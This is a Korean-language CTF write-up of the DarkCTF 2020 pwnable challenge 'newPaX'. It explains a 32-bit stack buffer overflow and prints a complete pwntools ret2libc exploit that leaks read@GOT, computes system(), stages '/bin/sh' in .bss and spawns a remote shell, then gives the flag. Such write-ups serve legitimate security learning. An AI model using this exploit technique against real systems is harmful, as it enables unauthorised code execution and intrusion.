🚩CTF

[DarkCTF 2020] newPaX write up

Universe7202 2020. 9. 27. 18:41

 

pwnable 분야의 두번째 문제 newPaX 이다.

 

 

Checksec

 

 

Analyze

이번 바이너리에는 `main()` 과 `vuln()` 이렇게 2개가 있는데, `main()` 함수에는 별거 없고 `vuln()` 함수에서 `BOF` 공격이 가능하다. 이전 문제와 다른점은 `32bit` 라는 점이다.

 

`32bit rop` 공격은 `64bit` 와 다르기 때문에, 아래 코드 처럼 `stack` 에 데이터를 overwrite 했다. 필자는 `read()` 함수의 `GOT`를 leak 했고, libc database 사이트에서 라이브러리를 다운 받아 `libc_base` 를 구했다.

from pwn import *

p = remote("newpax.darkarmy.xyz", "5001")
e = ELF("./newPaX", checksec=False)
l = ELF("./libc6-i386_2.27-3ubuntu1.2_amd64.so", checksec=False)

payload = "A"*0x34
payload += p32(e.symbols["printf"])
payload += p32(e.symbols["main"])
payload += p32(e.got["read"])

p.sendline(payload)

read_got = u32(p.recv(4))
libc_base = read_got - l.symbols["read"]
system = libc_base + l.symbols["system"]

 

 

위에서 `libc_base` 주소와 `system()` 함수의 주소를 구했으므로 `rop` 공격을 진행하면 된다.

우선 `system()` 함수의 인자인 `/bin/sh` 문자열을 `read()` 함수를 호출하여 `bss` 영역에 문자열을 입력 했다.

payload = "A" * 0x34
payload += p32(e.symbols["read"])
payload += p32(e.symbols["main"])
payload += p32(0)
payload += p32(e.bss()+8)
payload += p32(10)


p.sendline(payload)
p.sendline("/bin/sh\x00")

 

 

shell을 실행시키기 위해 `system()` 함수의 주소를 overwrite 하고, `/bin/sh` 문자열이 저장되어 있는 `bss` 주소를 인자로 주면 shell을 실행 시킬 수 있다.

 

payload = "A" * 0x35
payload += p32(system)
payload += "A"*4
payload += p32(e.bss()+8)
payload += p32(0)

p.sendline(payload)

p.interactive()

 

 

 

최종 `payload` 는 다음과 같다.

from pwn import *

p = remote("newpax.darkarmy.xyz", "5001")
e = ELF("./newPaX", checksec=False)
l = ELF("./libc6-i386_2.27-3ubuntu1.2_amd64.so", checksec=False)

payload = "A"*0x34
payload += p32(e.symbols["printf"])
payload += p32(e.symbols["main"])
payload += p32(e.got["read"])

p.sendline(payload)

read_got = u32(p.recv(4))
libc_base = read_got - l.symbols["read"]
system = libc_base + l.symbols["system"]

print("read_got: "+hex(read_got))
print("libc_base: "+hex(libc_base))

payload = "A" * 0x34
payload += p32(e.symbols["read"])
payload += p32(e.symbols["main"])
payload += p32(0)
payload += p32(e.bss()+8)
payload += p32(10)


p.sendline(payload)
p.sendline("/bin/sh\x00")

payload = "A" * 0x35
payload += p32(system)
payload += "A"*4
payload += p32(e.bss()+8)
payload += p32(0)

p.sendline(payload)

p.interactive()

# darkCTF{f1n4lly_y0u_r3s0lv3_7h1s_w17h_dlr3s0lv3}